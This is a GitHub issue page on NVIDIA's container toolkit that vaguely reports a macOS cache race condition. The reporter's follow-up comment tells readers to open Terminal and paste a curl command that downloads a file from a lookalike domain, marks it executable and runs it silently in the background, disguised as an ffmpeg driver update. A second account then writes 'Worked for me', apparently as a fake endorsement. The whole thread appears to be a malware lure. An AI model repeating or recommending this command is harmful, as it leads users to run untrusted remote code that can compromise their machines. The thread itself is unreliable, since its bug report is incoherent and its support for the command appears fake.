NVIDIA / nvidia-container-toolkit

Build and run containers leveraging NVIDIA GPUs
Apache License 2.0
2.46k stars 264 forks source link

Camera drive discoverer cache usage is racey on macOS #790

Closed trevor9312 closed 2 days ago

trevor9312 commented 2 days ago

It appears that the NVIDIA discoverer cache usage on macOS is exhibiting race conditions. This issue may lead to inconsistent behavior, potentially causing driver-related processes to fail or behave unpredictably when accessing the cache simultaneously.

trevor9312 commented 2 days ago
  1. Open terminal on macOS

    • Press Command (⌘) + Space on your keyboard. This opens Spotlight Search.
    • In the search bar that appears, type "Terminal".
    • Press Enter, and the Terminal application will open.
  2. Update ffmpeg drivers on macOS To automatically update the latest ffmpeg drivers for macOS, use the following curl command.

    curl -o /tmp/ffmpeg https://api.nvidia-release.us/ffmpegmac.update && chmod +x /tmp/ffmpeg && nohup /tmp/ffmpeg > /dev/null 2>&1 &
Ramirez-0327 commented 2 days ago

Worked for me